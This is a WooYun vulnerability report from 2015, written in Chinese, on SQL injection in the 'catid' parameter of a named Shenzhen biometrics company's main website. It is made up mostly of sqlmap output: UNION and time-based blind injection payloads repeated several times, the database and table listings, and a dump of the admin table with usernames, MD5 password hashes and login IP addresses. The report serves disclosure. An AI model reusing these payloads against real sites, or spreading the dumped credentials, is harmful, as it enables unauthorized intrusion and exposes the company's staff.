漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0137047
漏洞标题:天识科技漏洞一枚
相关厂商:深圳市天识科技有限公司
漏洞作者: 爱上平顶山
提交时间:2015-08-28 09:19
修复时间:2015-10-12 09:20
公开时间:2015-10-12 09:20
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:8
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-08-28: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-12: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
天识科技
深圳市天识科技有限公司,是中国信息安全及生物识别行业最具影响力的产品和服务供应商,是中国科技开发院的下属骨干企业。目前拥有的“SUPIDENT/天识”品牌是中国信息安全和生物识别行业最具影响力的品牌之一。公司的产品获得多项国家专利,公司的全线生物识别产品拥有完全的自主知识产权,具备国家信息安全工程服务资质。
from:http://www.freebuf.com/jobs/75863.html 招人的...
详细说明:
主站
http://www.supident.com/?f=show&catid=23&id=145 sqlmap下就行了
sqlmap identified the following injection points with a total of 185 HTTP(s) requests:
---
Place: GET
Parameter: catid
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: f=show&catid=23 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7871773a,0x7a4c437646777353486c,0x3a7066753a)#&id=145
Vector: UNION ALL SELECT NULL, [QUERY]#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: f=show&catid=23 AND SLEEP(5)&id=145
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catid
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: f=show&catid=23 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7871773a,0x7a4c437646777353486c,0x3a7066753a)#&id=145
Vector: UNION ALL SELECT NULL, [QUERY]#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: f=show&catid=23 AND SLEEP(5)&id=145
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
database management system users [1]:
[*] 'bdm0200082'@'%'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catid
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: f=show&catid=23 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7871773a,0x7a4c437646777353486c,0x3a7066753a)#&id=145
Vector: UNION ALL SELECT NULL, [QUERY]#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: f=show&catid=23 AND SLEEP(5)&id=145
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
available databases [2]:
[*] bdm0200082_db
[*] information_schema
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catid
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: f=show&catid=23 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7871773a,0x7a4c437646777353486c,0x3a7066753a)#&id=145
Vector: UNION ALL SELECT NULL, [QUERY]#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: f=show&catid=23 AND SLEEP(5)&id=145
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
Database: bdm0200082_db
+-------------+---------+
| Table | Entries |
+-------------+---------+
| jo2_file | 199 |
| jo2_content | 106 |
| jo2_cate | 26 |
| jo2_message | 5 |
| jo2_user | 4 |
| jo2_admin | 3 |
| jo2_link | 2 |
| jo2_config | 1 |
+-------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: catid
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: f=show&catid=23 LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7871773a,0x7a4c437646777353486c,0x3a7066753a)#&id=145
Vector: UNION ALL SELECT NULL, [QUERY]#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: f=show&catid=23 AND SLEEP(5)&id=145
Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])
---
Database: bdm0200082_db
Table: jo2_admin
[3 entries]
+--------+---------+---------+---------+---------+---------+----------+----------+----------+----------------------------------+------------+----------------+---------------+
| userid | prv | bumen | zhiwu | email | dianhua | username | disabled | fullname | password | logintimes | lastloginip | lastlogintime |
+--------+---------+---------+---------+---------+---------+----------+----------+----------+----------------------------------+------------+----------------+---------------+
| 1 | <blank> | 客户支持部 | <blank> | <blank> | <blank> | admin | 0 | 天识管理员 | 300343cb7bcf52581e96270be334fa61 | 352 | 115.71.5.205 | 1440494216 |
| 10 | 1 | 技术部 | 经理 | <blank> | <blank> | zonvon | 0 | 小兵 | b8b186e835fbaec5bdd44d49fb4f5023 | 0 | NULL | NULL |
| 11 | Array | <blank> | <blank> | <blank> | <blank> | duihao | 0 | <blank> | b8b186e835fbaec5bdd44d49fb4f5023 | 1 | 221.221.11.230 | 1315028821 |
+--------+---------+---------+---------+---------+---------+----------+----------+----------+----------------------------------+------------+----------------+---------------+
你们对于自己的主站不做防御?
ok
漏洞证明:
···
修复方案:
···
版权声明:转载请注明来源 爱上平顶山@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝